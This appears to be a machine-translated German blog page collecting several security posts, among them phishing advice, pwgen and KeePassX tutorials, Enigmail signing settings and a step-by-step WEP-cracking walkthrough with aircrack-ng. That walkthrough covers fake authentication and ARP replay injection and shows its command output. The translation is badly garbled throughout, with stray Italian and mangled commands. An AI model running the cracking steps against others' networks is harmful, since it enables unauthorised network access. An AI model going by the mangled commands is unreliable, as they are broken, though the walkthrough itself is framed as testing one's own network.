Wenn Sie interessiert sind, um diese Website aktualisiert werden über neue Artikel veröffentlicht abonnieren Sie den RSS-Feed . Vielen Dank für Ihren Besuch!

In den letzten Jahren exponentiell gestiegen in der Anzahl der Geräte zur Überwachung eingesetzt. Die Städte sind voll von Kameras, werden die Unternehmen fortschrittliche CCTV, Tausende von Geschwindigkeit haben Kameras sind bereit, um Bilder zu machen quotidinamanente Autos, die Höchstgeschwindigkeiten von der Straßenverkehrsordnung, die öffentlichen Verkehrsmittel verhängt überschreiten nehmen unsere Bewegungen und so weiter und so fort. Heutzutage ist es wirklich schwierig, Unternehmen in der Öffentlichkeit tun, ohne Schuss von Überwachungskameras. Diese Tatsache hat schließlich auch realisiert die Privatsphäre Garantin , dass die ame Maßnahme 8. April 2010 zur Aktualisierung 2004 der inzwischen veralteten Regeln videosoveglianza aus dem Jahr. Was wird für diejenigen, die diese Systeme zu installieren ändern? Und vor allem können Sie sicherstellen, ein gutes Maß an Privatsphäre für die Bürger? Weiter lesen ...

Ich habe immer von der Möglichkeit der Verwendung von unkonventionellen meine Webcam fasziniert gewesen. Ehrlich gesagt, da kaufte ich vor fast einem Jahr habe ich bis zur 3 oder 4 Gelegenheiten. Also, ich dachte, dass vielleicht sollte sie nutzen die Webcam-Video für einen anderen Gebrauch aus und weil ich oft bleiben weg von meinem Desktop, dass bei Aufenthalten auch in meiner Abwesenheit, ist nicht ganz falsche Vorstellung von Videoüberwachung . Natürlich, mit Linux kannst du alles tun, sogar das Undenkbare ... nur ein bisschen "Zeit und ein bisschen" Erfahrung und du bist fertig. Heute sprechen wir von Motion , Software zum Aufspüren von Bewegungen in einer Videoquelle (z. B. eine Webcam ) und Direktoren Datei Video und Bilder. ... Lesen Sie weiter

In diesen Tagen (bis zum 7. August) statt eines der beliebtesten Konferenzen in der Welt in Bezug auf die Sicherheit: Die Black-Hat-Konferenz. Die diesjährige Konferenz wird in Los Angeles, aber das ist nichts Neues. In der Tat, in den letzten Tagen des Monats Juli bekam ich einen Artikel auf dem Blog der Washington Post Abschnitt "Sicherheit", wo Sie es! wird erklärt, dass zwei gut reden Apple Sicherheits-Schwachstellen wurden gestrichen worden Weiter lesen ...

Am 10. Juli wurde offiziell Guinness erreichte die Rekord für den Firefox 3 Download Day gut mit 8.002.530 Menschen, die heruntergeladen populärste Open-Source-Browser in den 24 Stunden zwischen 18:16 UTC am 17. Juni 2008 und 18. 16 UTC am 18. Juni 2008. Gestern wurde Firefox veröffentlicht das erste Update in der Version 3.0.1. ... Lesen Sie weiter

Wenn Sie Software verwenden für den Austausch von Dateien über das Internet, so wie aMule , sollte vermieden werden, den Computer, um Verbindungen zu, die zählt, z. B. öffentliche Einrichtungen. In der Tat kommt es oft vor, dass unbemerkt an uns, den Computer über das Internet, auf die unsere Software-peer-to-Peer zu senden oder Empfangen von Dateien verbindet kontrolliert oder kontrollierbar ist. Selbst in einigen Fällen gibt es Real Spy-Servern, die Kontrolle teilenden die Dateien, die wir sind und bereit sind, Dateien zu speichern unsere Aktivitäten im Bereich des Austausches. Es ist nicht sehr langem news Zündung einige dedizierte Server für emule, genau, die Logging-Aktivitäten der ahnungslose Quellen von Dateien. Weiter lesen ...

Jeden Tag erhalte ich mehrere E-Mail-Phishing. fasulli o messaggi istantanei, ma anche contatti telefonici. Wikipwdia bringt uns eine ausgezeichnete Definition dieses Phänomens in Computer-Phishing ("Überlaufen (sensible Daten), in italienischer Sprache) ist eine illegale Aktivität, Engineering verwendet eine Technik des sozialen und wird verwendet, um Zugang persönliche oder vertrauliche Informationen mit dem Ziel, Identitätsdiebstahl durch die Nutzung der elektronischen Kommunikation, insbesondere E-Mails oder Instant Messages fake, aber telefonisch zu kontaktieren. Mit diesen Nachrichten, du bist betrogen und führte in die Preisgabe persönlicher Daten wie Kontonummer, Kreditkartennummer, Kenncodes, etc..

Persönlich, tritt das Problem nicht berührt mich mehr als fällig. In der Tat, zu Hause habe ich eine E-Mail-Server, der alle meine Konten und effttua durch SpamAssassin mit Rasiermesser und pyzor, die Kontrolle über eingehende E-Mails Spam behandelt. Die Folge ist, dass die Ordner mit unerwünschter Spam-Mails einschließlich derer, die Phishing-Mails enthalten gefüllt ist. Der beste Rat, den ich geben kann salvagardarsi für diese Art von Mails ist wie konfigurieren Sie eine E-Mail-Software Thunderbird mit dem Spam-Filter (wirklich gut auf den Betrieb des Thunderbird). Allerdings, wenn Sie nicht wollen, um spezifische Software für die Verwaltung von E-Mails oder für diejenigen, die in der Regel nutzen die Dienstleistungen des Lesens Mail über das Web, zeige ich Ihnen einen einfachen Trick, die Sie halten können weg von Phishing ...

Wie viele von Ihnen bereits wissen, E-Mails, Phishing sind so strukturiert, dass Sie glauben, dass das Gesetz nutzen, dass die Bank, Post oder ähnliche, für ein Geschenk oder eine Aktualisierung der persönlichen Daten durch den Zugang zu etwas zu fragen persönliche Bedienfeld. Das letzte Panel reproduziert wird in einer mehr oder weniger detailliert, als ob es die echte Webseite Ihrer Bank ... eigentlich gar nicht genau wie, dass ... wir als ein Beispiel von E-Mails, die in letzter Zeit um sich zu haben auf dem Netz worden: Italienische Post, nehmen waren " Poste.it belohnt Sie mit einem Treuebonus. " Der Body der Email fragt, um sich in der Postanweisung auf den Euro erhalten Sie einen Bonus von 500 delicious. Attached um Mail, natürlich gibt es einen Link.

Punkt, wo diese Verbindung? Wenn die Nachricht kam post von der Website der, sollte es vielmehr zeigen Sie auf der Website der www.poste.it, geht der Link auf eine andere Website und erst am Ende der Link ist ein Verweis auf eine Seite Post Office. Und hier ist zu vermeiden ergab die "Trick", um E-Mails werden durch Phishing betrogen ... wenn wir gefragt werden, melden Sie sich über den Link E-Mail beigefügt, müssen wir Sie mit der rechten Maustaste auf den Link und speichern " Adresse (wenn Sie Firefox verwenden Adresse: rechte Maustaste -> Copy). An diesem Punkt können wir notepad Öffnen Sie einen Texteditor (ist gut für Windows oder Notepad) und fügen Sie die Adresse einfach kopiert. Wenn es Link ist eine Phishing-Mail wird nicht versuchen, direkt auf einer Seite von Produkten, sondern an einem Ort wie diesem (mir ist nur ein Beispiel!)

http://www.qualcosa.da.ru/cgi-bin/pagine/posteitalianelogin.asp

Damit ist die erste Regel ist, dass kein Service wird jemals fragen, um per E-Mail anmelden. Dann, wenn wir wollten, um zu überprüfen, wenn die Mail gerade eingetroffen ist "glaubwürdig", folgen wir dem Beispiel habe ich soeben berichtet, dass die Spitze zu prüfen, wo der Link per E-Mail beigefügt ist.

Ich weiß, viele von Ihnen werden denken, Sie sind "fix" mit Passwörtern und deren Sicherheit. In der Tat niemand, das ist falsch denkt. Wenn Sie denken, das Passwort ist das erste Instrument, um Computer Gewährleistung der Sicherheit unserer und im allgemeinen alle unsere Aktivitäten im Internet. Bis ich vor einem Jahrzehnt, um Passwörter und andere anwendbare schwierig genug, aber irgendwie, dass wider gebräuchliche Wörter aus dem Vokabular, mit dem Laufe der Zeit erkannte ich, dass es viel sinnvoller ist, sichere und einfach zu zufällige Passwörter generieren und ausreichend lang. In der Tat, mit dem exponentiellen Wachstum der Rechenleistung von Computern, ist nicht besonders schwierig, zu einem Stichwort zu verfolgen. Ich traf und kennen viele Leute, die, anstatt den üblichen Geburtsdaten, Namen von Familienmitgliedern und dergleichen, die "Hacker schreiben." Unter Insidern Diese Technik ist ziemlich veraltet und wird um einige Buchstaben mit Zahlen zu ersetzen. Zum Beispiel: der Buchstabe "e" wird "3", "a" wird zu "4" und so weiter.

Es gibt jedoch einige Software, zufällige Passwörter generieren und sehr sicher. Sicherheit ist von vielen Faktoren ab. Erstens, das Passwort durch eine solche Software generiert wird nicht ein Wort gefunden in Wörterbüchern und daher sind wir geschützt vor Angriffen Brute-Force "auf Wortschatz." Betrachten wir zum Beispiel die mittlerweile berühmte " John The Ripper "und seine unglaubliche Fähigkeit zum Knacken von Passwörtern!

Software kann Passwörter generieren sowie Speicherung sicher, habe ich bereits gesprochen hier . Heute zeige ich euch ein anderes Passwort zu bedienende Software, um das Terminal zu erstellen und daher ist es nicht erforderlich Grafiken oder Desktop sortiert. Ich benutze ihn viel auf Linux-Server, wo Sie wissen, sind die Grafiken verboten . Ich bin pwgen Apropos.

Wenn, wie ich, haben Sie eine Linux-Distribution Debian oder Ubuntu (oder deren Derivate) pwgen können Sie über die üblichen apt-get-Tool zu installieren:

# Apt-get install pwgen

Und jetzt sehen wir, wie man es benutzt ...

Pwgen Syntax lautet wie folgt:

pwgen [OPTION] [pw_length] [num_pw]

Um alle Optionen ([OPTION]) zur Verfügung Ich schlage vor, lesen Sie das Handbuch Seiten der Software, erreichbar, wie üblich, mit dem Befehl "Mann". Das Kommando setzt sich mit der Möglichkeit der Angabe der Länge der Passwörter zu generieren ([pw_lenght]) und die Anzahl der Passwörter zu generieren ([num_pw]).

Wenn wir keine Optionen pwgen ausführen, wird die Software 160 Passwörter zu 8 Zeichen mit jeweils mindestens einen Großbuchstaben und eine Zahl im Inneren zu erzeugen. Hier ein Beispiel:

[15.23] [Stefano: Debian-laptop] ~ $> pwgen
Pee4Iej2 uu6cheDe ahKu3ulu jah8iePe eeM5eigh Kiix4jae Sai3NiaN leiJae9a
cha8Ahma gahGee2a phaiF8Ae ho7Riay2 aiPh4auv Keigoo7p OiGh8Ein to2Pai7f
Se0sae3U fah3Jaem dohPh9Ch Usaida0t iech8miJ moi1Nohr OQu2weeL UWoce5Ta
Oth7jaer fee2Lip1 cugh1Eiv Waivae3c aitheSh7 ahbeeh8O Uwaida7a ohKoh8de
ooPeegh7 aiShi7ji Ahsh6Ohv EedaiTh6 SeifeeS5 aeShoo8z LeVah2ca iluzei5T
pohpae4C zaigh2Eo euP5ohta lu3As5ae BahN8pei eisool7X Fe1aibau cooShu8u
bah7chuS Eesh8vei noh5aiYa OoN7aixe eimohJ6h Lahgu4Tu FeZoo2eZ bah7ieCh
Su0Sei0i Es1aetha Fee6quee esah4ieL gaeraJ0e eeg1if2A noh3Eghe pei7Ohge
wohxooG2 lik5Tiex aengiF4r cha1aiSu Zeish2su noB8aeSh Lop1aeQu ohmee9Id
Jah7ie8n Ka0feuv7 icoebi8H oDu8pooy so8enaiF caew9Ruu Oy3thie1 eew9Jaed
Esh6quee eeTia0tu che7cohG phie5Jeu oaNg4eex iesoo2Fu eHohM9Ee nao2Iiz2
AiNg6Hoo ahTh1aef uyeW4voo oeNei5de Vephohy3 iun4oVie ahtu2Chu ieno5Aij
Eike5Nae Ta7aet5l eSoobie3 Joh4Ximi raom2ahH Eiyo0eez Namix9pi iP6ohse6
CheiTh0a Doh8Iezo eewe5Jae eeg0ooJu du9VaeWo aiThaej6 eiPi8fai guuPh2ae
weiPh6oo Doh4gi2h iecioG2h ahPhei0t Ed7aenie eed1Oph9 Ekait1ro uD7Aegh0
uaHee1zu Kie3zosh fa8caaL9 ieraif6J Quiewei2 Liilux7i ke6Guuvo Ohphie1a
ieFeiZ6e wieSoaV7 EviaT4ae Uchaej8h uteaNg2s EeTus3vo sho5Do1j vaiVoo7p
zaisuG5Z equie4Ai Phaexaa4 cae7ahHe Iu3AiCoo OToce6Ge aet7EiMe uifohB1t
raiD4ieX an2Go3xi Cho5OoXu yeeKie1x ier7Yah1 pol6Ahre Loo6iequ Ootai3ep
aib6laK4 Paz0IeHa zooJ1sho ohwoh0Ja Yooboe0j aupheg8T aixeib3V aehaV2we
[15.23] [Stefano: Debian-laptop] ~ $>

Mal sehen, welche Optionen fügen Sie den Befehl auf eine kleinere Anzahl von Passwörtern erzeugen pwgen, aber mit mehr Zeichen:

Pwgen $ 10 ein

Letzter Befehl gebaut pwgen erzeugen ein einziges Passwort zu 10 Zeichen. Wieder einmal wird das Passwort enthält mindestens einen Großbuchstaben und einen Nummer. Fügen Sie noch eine weitere Option, um ein Passwort eingeben zu schaffen mindestens einen besonderen Charakter:

Pwgen 10 $ 1-y
Wer nguY2J +

Dieser Befehl ist der gleiche wie oben, aber durch das "-y" das generierte Passwort wird mindestens ein Sonderzeichen enthalten.
Weiterbildung den Zusatz von Optionen, versuchen, mehr sichere Passwörter, indem Sie die Option "-s" zu generieren:

Pwgen $ 10 1-s-y
Ge ^ (8 * | z `(

Wie Sie das Passwort sehen kann wird es sehr schwer, beide zu identifizieren und unvergesslich sein. Aber für das letztgenannte Problem wir helfen können mit immer KeePass

Pwgen Möglichkeiten sind viele. Sie reichen von der Möglichkeit der Bitte um Passwort-Generierung ohne Großbuchstaben, ohne den Schlüssel Generation von Zeichen, die verwechselt werden können (zum Beispiel mit der 0 O) ... Sie müssen nur auf den Seiten der Software zu lesen:

$ Man pwgen

Ich bin sicher, das passiert sehr oft vergessen, Passwörter. Ebenso wie den Zugang zu Websites, die nicht persönlich an oft und so schwer, diejenigen zu erinnern. Viele Menschen, anstatt das Risiko des Vergessens ihr Passwort, beschließen sie, um Suchbegriffe zu einfach zu verwenden, um zu ermitteln .. Manche Menschen sind in der Regel mit Hilfe des Geburtsdatums, der das Nummernschild ihres Wagens, der den Namen Ihres Hundes und so weiter und so fort. Andere, zu wissen, der Gefahr der Verwendung von Passwörtern so leicht zu finden, neigen dazu, schreiben ihre Schlüsselworte für lose Blätter in Ihrer Brieftasche oder sogar in Text-Dateien auf Ihrem Laptop! Welche Torheit! Oh ja ... es ist eine Torheit. Stell dir vor, was passieren kann, wenn Sie Ihren Geldbeutel zu verlieren, wenn sie die Festplatte Ihres Computers Pausen oder, schlimmer noch, wenn Sie den Laptop zu stehlen. Ganz zu schweigen, dann, all jene Geschäftstätigkeiten, wo das Dekret Privatsphäre der Verwendung von Passwörtern mindestens 8 Zeichen und alphanumerische beauftragt hat. Ich frage mich immer noch, wie viele Unternehmen und viele Profis sind immer noch angemessen, Ihr Passwort zu ändern, alle 6 oder 3 Monate. Aber das ist eine andere Geschichte.

Heute möchte ich darüber sprechen Keepass , Open Source und freie Software für Linux, Windows und MacOS. KeePass erlaubt Ihnen, Datenbank speichern Passwörter in einer verschlüsselten, um Computer zu tragen dieser Datenbank auf Ihrem fliegen generieren die Passwörter auf dem, für uns notwendig füllen Sie das Web-Formular mit den Informationen zu Dienstleistungen Login für den Zugang zu unseren beliebtesten und nachzuweisen, ein Datum oder eine maximale Kennwort Alter ist es sehr nützlich, um die Verantwortlichen für die Privatsphäre müssen wachsam sein, über das Ändern von Passwörtern in Ihrem Büro. Alle ohne die Angst etwas zu verlieren riskieren, weil die Datenbank, dass das Passwort enthält, ist verschlüsselt und geschützt durch Passwort und somit auch im Falle eines Diebstahls des Computers, kann niemand auf die Datenbank zugreifen der Schlüssel, um Zugang zu unseren Dienstleistungen. Aber es ist alles da Keepass nützliche Nummer kann mit einem integrierten Plugins , dass ihre Funktionen zu erweitern. Ich persönlich verwende es seit einiger Zeit und ich habe so konfiguriert werden, sobald sie beginnt mein geliebtes Debian und so setzen Sie in trayicon darauf warten, genutzt werden Aber wir sehen, wie zu benutzen.

Zur Installation wird einfach das Keepass gehen auf die offizielle Website und gehen Sie zum Download . Für jemanden wie mich, hat Debian oder Ubuntu, geben Sie einfach im Terminal als root den folgenden Befehl ein:

# Apt-get install KeePassX

Nach dem Download und der Installation kann beginnen wir mit dieser fantastischen Software. Auch wenn Sie Debian oder Ubuntu, beginnend Keepass kann durch Zugriff auf das Menü vorgenommen werden Anwendungen-> Zubehör-> KeePassX. Hier ist, was dem ersten Bildschirm:

An dieser Stelle müssen wir mit dem Erstellen der ersten Datenbank, dass das Passwort enthalten soll gehen. Dazu müssen wir zuerst auf das Icon am oberen linken Rand des Bildschirms. Dadurch öffnet sich ein Fenster wie folgt aus:

Geben Sie den Namen der Datenbank-Datei, dass unsere Daten und clicchimo Schaltfläche enthält "Ok". Dies öffnet ein weiteres Fenster, das uns das Passwort für Datenbank-Sicherheit geben möchte. Es ist sehr wichtig, dass Sie ein Kennwort ein, dass schwer zu erkennen ist. In der Tat, von nun an wird dies die einzige Kennwort, das schwierig ist und dass wir daran denken, dass wird bei jedem Öffnen der Datenbank benötigt werden, mit KeePass werden. Der Rest kümmert sich um Passwort-Software:

Einmal fertig erstellt die erste Datenbank, können wir beginnen mit KeePass. Der erste Schritt ist die Einrichtung einer Gruppe vergessen. Dazu müssen Sie auf die rechte Maustaste auf der linken Seite des Bildschirms, wie in der Abbildung dargestellt:

Wir öffnen ein weiteres Fenster, wo Sie den Namen einer Gruppe und möglicherweise ein Symbol mit ihr verbunden sind:

Wir können nun beginnen, die Eingabe von Daten auf Ihre Passwörter, Benutzernamen, etc.. Lassen Sie uns in dem rechten Fensterbereich, und klicken Sie die rechte Maustaste, gehen Sie zu der Aufnahme neuer Daten auszuwählen:

Dies öffnet das Fenster, das Sie in den nächsten Ort sehen können, wo das Label Name, Benutzername, Kennwort, URL, auf die wir die Dateneingabe (sehr nützlich, wenn wir die Funktion Abschluss Verwendung finden Automatische Form) und andere Informationen, einschließlich, sehr nützlich sein, die Aufnahme des Begriffs eingegebene Passwort:

So setzen wir unsere Daten in der ersten Datenbank. Mal sehen, einige nützliche Features wie die Passwort-Generator. Dies ist ein sehr nützliches Werkzeug, um zufällige Passwörter erstellen sind schwer zu finden, die alle nach einigen Kriterien wie die Länge des Schlüsselwortes, die Verwendung von Sonderzeichen, mit Zahlen, etc.. Diese Funktion kann durch einen Klick auf das Menü "Extras -> Password Generator" zugegriffen werden. Hier ist das Fenster, um den Druck der erwähnten Schlüssel-Menü öffnet sich:

In diesem Fenster können Sie Optionen auswählen, um das Passwort zu erstellen, wie ich bereits sagte. Sobald wir uns entschieden, wie die Generation machen, wir können klicken Sie auf "Erstellen" und wird ein weiteres Fenster, das Informationen über die Höhe der Entropie offen vor der Generierung der Passwörter gesammelt werden:

So sammeln Entropie wird einfach mit der Maus bis zum Wert von 100% an der Bar im Bildfenster oben gezeigt wurde nicht mitgeteilt.

Wie Sie bemerkt haben, ist KeePass eine wirklich nützliche Software und vielfältig. Worth und es verwenden, um Ihre Passwörter schützen vor neugierigen Blicken!

Wie ich versprochen, nachdem er gezeigt, wie man 2200BG laden Sie die Treiber für die Netzwerkkarte Intel Pro Wireless auch mit dem Patch für Packet Injection ermöglicht in diesem Handbuch zeigen Ihnen, wie Sie einen Bestätigungs- Sicherheit Ihres drahtlosen Netzwerks. Insbesondere werden wir sehen, wie einfach und schnell Zugang zu einem sicheren Wireless-Netzwerk mit WEP-Schlüssel. Natürlich ist alles in diesem Guide ausgesetzt sein können Sicherheit wiedergegeben werden ausschließlich auf seinem WLAN-Netzwerk oder über ein Netzwerk, wo wir waren vorher überprüfen dürfen. Es strafrechtlichen Verfahren mit den Techniken gezeigt, wo in öffentlichen Netzen oder Wir durften nicht! Ich habe Sie gewarnt!

Zur Durchführung von Penetrationstests in Ihrem drahtlosen Netzwerk müssen wir haben eine GNU / Linux installiert und ausgeführt wird, einen drahtlosen Netzwerkadapter ermächtigt Injektion machen das Paket, und schließlich die bekannte Software aircrack-ng (möglicherweise die letzte Version erhältlich). Ein sehr wichtiger Aspekt ist, um zu überprüfen, dass die Netzwerkkarte berechtigt ist, Packet Injection durchzuführen. Die letztere Methode ist das Senden einer Access-Point, einige Pakete mit Gewalt zu nötigen Informationen, um zu bekommen, dann den WEP-Schlüssel zu knacken. Um zu überprüfen, ob Ihre Karte unterstützt Packet Injection und zu wissen, wie es zu ermöglichen, beziehen sich auf dieser Seite . Wenn also eine Version von aircrack haben die größer oder gleich 1.0_beta installiert haben ein Tool zum Herunterladen und Installieren der erforderlichen Genehmigung der Packet Injection-Treiber für Ihre Karte (installiert Aufruf airdriver-ng) ... aber Schritt für Schritt.

Wenn Sie noch kein aircrack-ng installiert und haben Sie eine Linux Distribution wie Debian oder Ubuntu-Installation kann auf diese Weise verfahren (nachdem Sie sich als root -> sudo-s zu Ubuntu oder Debian):

# Apt-get install aircrack-ng

An diesem Punkt müssen wir Promiscuous Mode der Wireless-Netzwerkkarte aktivieren. In meinem Beispiel habe ich zu meinem Netzwerk-Adapter mit Atheros-Chipsatz bezeichnet wird (dies ist eine Proxim Orinoco Gold PCMCIA), die als wifi0 identifiziert wird. Hier ist, wie es geht:

# Airmon-ng starten wifi0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
eth2 Centrino b / g ipw2200
wlan0 Atheros madwifi-ng VAP (parent: wifi0)
ath0 Atheros madwifi-ng VAP (parent: wifi0) (Monitor-Modus aktiviert)

Wie Sie sehen können, aktivieren Sie den Befehl airmon-ng-Monitor-Modus auf ath0-Karte, erstellt auf der Fliege als "relative" von wifi0. Es ist nicht gesagt, dass für Ihre Karte ist auf der Fliege ein neues Gerät erstellt. Dies hängt von der Fahrer-und die Netzwerkkarte im Einsatz. Es ist wichtig, dass Sie die Karte gelesen hat, der "Monitor-Modus aktivieren".

Wenn Sie fertig sind wir bereit, das Paket-Sniffer starten, um zu überprüfen, ob Ihr Access Point aktiviert ist und einige grundlegende Daten wie MAC-Adresse (BSSID) des Access Points zu bekommen, den Kanal überträgt, und schließlich, wenn Es gibt andere Computer verbunden ist. Diese Informationen sind unerlässlich, um Packet Injection durchführen!
Unten führen wir den Befehl auszuführen und die Ausgabe:

# Airodump-ng ath0
[CH 11] [Abgelaufene: 4 s] [2008.05.03 17.39
BSSID PWR Beacons # Data, # / s CH MB ENC ESSID CIPHER AUTH
00: XX: XX: XX: XX: XX 22 6 0 0 6 48 WEP WEP TEST
BSSID STATION PWR Packets Probes bewerten Lost

In meinem Fall gibt es nur einen Access Point, dessen Name TEST (ESSID), die MAC (BSSID) ist offenbar verdunkelt, deren Arbeitszeit beträgt 6-Kanal und wird durch WEP geschützt. Auch sind andere Computer zugeordnet.
Einmal entdeckt, diese Daten halten wir airodump-ng kann durch Drücken der Tastenkombination STRG + C. Ja, von diesem Moment an haben wir, um anzugeben, airodump die Datenerhebung nur auf Kanal 6 durchzuführen (Wo kommt unser AP) und wir, der Einfachheit halber haben, den Namen der Datei, in der die erfassten Daten zu speichern. Gehen Sie wie folgt:

# Airodump-ng-c 6-w file_di_cattura.ivs ath0

An diesem Punkt beginnen airodump-ng lauscht auf einem Kanal Nr. 6 (6-c) und Speichern fängt alles in der Datei "file_di_cattura.ivs.cap (-w). Lassen Sie es auf dem Terminal mit airodump-ng und den Zugang zu einem anderen Terminal. Im letzteren haben wir auf eine gefälschte Authentifizierung zu unserem WLAN-Zugangspunkt zu tun. Was bedeutet es? Wir müssen daran glauben, dass wir Wireless Access Point autentucati auf ihn und genehmigt, es zu benutzen. Seien Sie vorsichtig, weil zu diesem Zeitpunkt, ob der Access Point die MAC-Adresse auf den aktiven Schutz aktiviert ist, es zu benutzen, müssen wir einen Netzwerkadapter mit MAC zugelassen. Wo wir sind mit der Karte ist nicht berechtigt, die AP-Zugang, können wir damit in der Access Point aus dem Administrationsbereich, oder wissen die MAC-Adresse eines Netzwerkadapters ermächtigt, wir können die MAC-Adresse der Karte Netzwerk verwendet werden, um "Angriff" den Zugangspunkt (zB mit der Software "macchanger). So können wir mit dem falschen Authentifizierung mit diesem Befehl gehen:

# Aireplay-ng -1 0-e (ESSID - in meinem Testfall)-b (Access Point MAC)-h (MAC Netzwerkkarte) ath0 (oder den Namen Ihres Geräts)
18.02.17 Warten auf Beacon Frame (BSSID: XX: XX: XX: XX: XX: XX) auf Kanal 6
18.02.17 Senden Authentication Request (Open System) [ACK]
18.02.17 Authentifizierung erfolgreich
18.02.17 Senden Association Request [ACK]
18.02.17 Association erfolgreich

Wie Sie sehen können, wurde die Ausgabe des Befehls, der uns sagt, dass wir den Angriff auf das falsche Authentifizierung gestartet erfolgreich. An diesem Punkt müssen wir Packet Injection durchzuführen. Öffnen Sie ein drittes Terminal und geben Sie folgenden Befehl ein:

# Aireplay-ng-3-b (Access Point MAC)-h (MAC Netzwerkkarte) ath0 (oder den Namen Ihres Geräts)

Die Ausgabe dieses Befehls ist wie folgt:

18.07.23 Warten auf Beacon Frame (BSSID: XX: XX: XX: XX: XX: XX) auf Kanal 6
Saving ARP-Anfragen in replay_arp-0503-180723.cap
Sie sollten auch anfangen, airodump-ng zu erfassen Antworten.
Gelesen 157 Pakete (ARP-Anfragen bekam 0 und 0 ACKs), schickte 0 packets ... (0 pps)

Ich habe absichtlich Legen Sie einen Teil der Ausgabe in fetter .. ist, dass nach ein paar Sekunden (oder Minuten) erfordert Ihre Aufmerksamkeit. In der Tat sieht man, dass Start in die ARP-Anfragen zu erhöhen und das sind die Daten, die wir durch offene airodump terminale.Eccovi ein weiteres Beispiel für eine Erhöhung der ARP-Pakete zu sammeln, sind:

18.07.23 Warten auf Beacon Frame (BSSID: XX: XX: XX: XX: XX: XX) auf Kanal 6
Saving ARP-Anfragen in replay_arp-0503-180723.cap
Sie sollten auch anfangen, airodump-ng zu erfassen Antworten.
Lesen 101.922 Pakete (ARP-Anfragen bekam 54.381 und 31.849 ACKs), 49.287 Pakete verschickt ... (499 KKS)

Nachdem Sie mindestens 50.000 Pakete (gesammelt haben collezionatene viele weitere beeindruckende angesichts der Geschwindigkeit, mit der Erhöhung) sind bereit, das selbst zu knacken. Stop, dann ist dass die arpreplay airodump STRG + C drücken in den beiden Terminals eröffnen. Bewegen Sie das Terminal, wo es stellte sich airodump-ng und wo Sie am Ende mit Ausgabe wie folgt:

CH 6] [Abgelaufene: 11 Min.] [2008.05.03 18.13
RXQ BSSID PWR Beacons # Data, # / s CH MB ENC ESSID CIPHER AUTH
XX: XX: XX: XX: XX: XX 176 100 6474 1175 6 48 92 0 WEP WEP OPN TEST
BSSID STATION PWR Packets Probes bewerten Lost
XX: XX: XX: XX: XX: XX XX: XX: XX: XX: XX: XX 220 1.1 132 104 2928

Wie Sie bemerkt, Mel meinem Fall habe ich über 110.000 Pakete von Daten nützlich für die Herstellung crack gesammelt haben. Also, ich bin bereit zu starten aircrack-ng wie folgt aus:

# Aircrack-ng file_di_cattura.ivs.cap

Es scheint unglaublich, aber mit etwas mehr als 100.000 erfassten Pakete es dauert weniger als eine zweite Taste, um das Netzwerk zu identifizieren:

Aircrack-ng 1,0 beta2
[00.00.00] Getestete 808 Tasten (got 117.588 IVs)
KB Tiefe byte (Abstimmung)
0 0 / 1 2D (175 872) 72 (135.680) EE (132 352) 07 (130 304) AD (129.024) DF (129 024) 81 (128 768) 8C (128.512) BC (128.256) EB (128.000) 6C (127.744) 5c ( 127.488)
1 22 / 1 AC (125 952) 57 (125 184) A6 (125.184) D6 (125184) 15 (124 672) 69 (124 672) 7B (124.672) E9 (124.672) Q4 (124.416) FD (124.416) 6C (124.160) E8 ( 124 160) 2 1 / 22 4D (132 352) C4 (131.328) C9 (130.048) 5A (129.280) 6D (129.280) 3E (129.024) D0 (129 024) 45 (127 744) DA (127 488) A2 (127232) 69 (126 976) CD (126 976) 3 0 / 2 E4 (163 328) A5 (131 072) 43 (130 560) 4A (129 792) 80 (128 768) BE (128 768) 41 (128256) D7 (128000) 79 (127 744) 9B (127.488) 7a ( 127.232) E8 (127 232) 4 38 / 4 ED (123.392) 4F (123 136) 68 (122 624) 84 (122.624) D9 (122.624) 5E (122 368) 88 (122 368) 1A (122 112) C0 (122.112) EG (122.112) 05 (121856) 59 (121856)
Schlüssel gefunden! [XX: XX: XX: XX: XX: XX: XX: XX: XX: XX: XX: XX: XX]
: 100% korrekt entschlüsselt

Wie viele von Ihnen haben versucht Verlängerung Thuinderbird, Enigmail, die GPG-Schlüssel (Unterschrift und / oder E-Mails verschlüsseln), wird es sicherlich gefragt, wie der Algorithmus verwendet, um Nachrichten zu signieren Veränderungen zu bewältigen. Standardmäßig ist die Erweiterung Enigmail ermöglicht es uns, die Signatur-Algorithmus mit SHA1 zB embrerebbe altri.In verwenden nicht die Tatsache, können Sie auch andere Algorithmen zum Signieren der Nachricht und Zweck dieses kleinen how-to zeigen Ihnen, wie. Let's go auf. ... Zutaten Rezept:
1) E-Mail-Client Mozilla Thunderbird (ich persönlich verwendete Version 2.0.0.6);

2) GnuPG installiert und arbeiten mit unseren Schlüsselpaar bereits erstellt;

3) Erweiterung der Enigmail für Mozilla Thunderbird. (Persönlich habe ich Version 0.95.3).

Zubereitung des Rezeptes:

Nach dem Öffnen Thunderbird, wählen Sie das Menü "OpenPGP -> Einstellungen.

Dies wird ein neues Fenster mit ein paar Tische öffnen ... gehen Sie in die Tabelle "Erweitert" und fügen Sie das Feld "Zusätzliche Parameter von GnuPG" die folgende Option:

-Enable-DSA2

Nun klicken Sie auf die Schaltfläche OK und öffnen Sie das Menü 'Thunderbird' Bearbeiten -> Einstellungen. " Eröffnung im nächsten Fenster in der Tabelle gehen "Erweitert -> Allgemein" und klicken Sie auf "Configuration Editor".

Dies öffnet ein neues Fenster, wo wir geben einen Suchfilter:

extensions.enigmail.mimeHashAlgorithm

Sobald Sie den Schlüssel zu ändern, die ausgewählten und klicken Sie mit der rechten Maustaste auf den Schlüssel gefunden. Im Menü "Kontext, müssen Sie klicken Sie auf die Schaltfläche" Bearbeiten "und ändern Sie den Standardwert von 0 auf eine andere Nummer öffnet sich ... in unserem Fall, da wir die Signatur-Algorithmus SHA256 statt SHA1 verwenden, geben Sie den Wert 3.

Wir fertigen an dieser Stelle ... Versuchen Sie einfach eine E-Mail-Nachricht unterschreiben, um zu überprüfen, dass der Algorithmus SHA256 verwendet werden.